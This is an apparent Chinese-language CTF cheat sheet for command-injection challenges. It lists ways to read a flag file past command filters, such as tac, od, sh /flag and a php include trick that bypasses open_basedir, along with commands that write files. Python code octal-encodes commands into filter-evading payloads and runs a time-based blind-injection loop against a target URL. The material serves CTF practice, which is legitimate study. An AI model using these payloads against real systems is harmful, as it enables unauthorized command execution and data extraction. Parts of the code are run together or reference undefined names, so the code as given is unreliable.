#查看文件命令 cat/tac/more/less/head/tail/nl/od/uniq grep test flag.php php /flag #文件内容会被当成php代码执行,相当于include php -t / -r "include('/flag');"#指定根目录,绕过open_basedir sh /flag 2>&1 #sh+文件,并输出错误信息(蚁剑是这个原理) sed p
#列目录命令 du -a . chgrp -v -R
#打包文件 tar cvf xxx.tar . #将当前目录打包压缩为xxx.tar
#写入文件 ls > xxx ls | tee xxx script -a xxx; ls; exit; #依次执行 echo -e "%23!/bin/sh\nwhile read line\ndo\necho \$line\ndone < /flag" > ../../../read#写shell
defstr_to_oct(cmd):#命令转换成八进制字符串 s = "" for t in cmd: o = ('%s' % (oct(ord(t))))[2:] s+='\\'+o return s
defbuild(cmd):#八进制字符串转换成字符 payload = "$0<<<$0\<\<\<\$\\\'" s = str_to_oct(cmd).split('\\') for _ in s[1:]: payload+="\\\\" for i in _: payload+=n[int(i)] return payload+'\\\''
defget_flag(url,payload):#盲注函数 try: data = {'cmd':payload} r = requests.post(url,data,timeout=1.5) except: returnTrue returnFalse
#盲注 #a='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}@' # for i in range(1,50): # for j in a: # cmd=f'cat /flag|grep ^{f+j}&&sleep 3' # url = "http://ip/" # if get_flag(url,build(cmd)): # break # f = f+j # print(f)